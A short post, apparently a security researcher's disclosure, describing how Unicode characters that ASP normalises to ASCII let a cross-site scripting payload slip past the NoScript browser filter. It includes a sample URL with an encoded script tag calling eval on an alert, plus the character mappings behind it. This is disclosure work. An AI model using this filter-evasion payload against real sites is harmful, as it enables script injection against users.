NoScript v220.127.116.11 does not have this problem anymore. I’m happier now. tnx to its clever author.
As I told Giorgio, all the problems will be reported to him first ;)
Woohoo! You/We/They/or whatever! can still use unicode in some places!
NoScript cannot find out special unicode characters which mean something in ASP:
http://Example.com/VulnFile.asp?DangInput=%u2329scr%u0131pt%u232A%u212Fval(‘alert’%2b'(“NoScript Bypass in ASP!\\nBy Soroush Dalili”)’)%u2329/scr%u0131pt%u232A
In this example I selected the characters from: http://rishida.net/scripts/uniview/uniview.php . For instance:
%u2329 = <
%u0131 = i
%u232A = >
%u212F = e
From Microsoft point of view! Therefore, IE8 XSS prevention can detect this encoding and NoScript cannot detect it.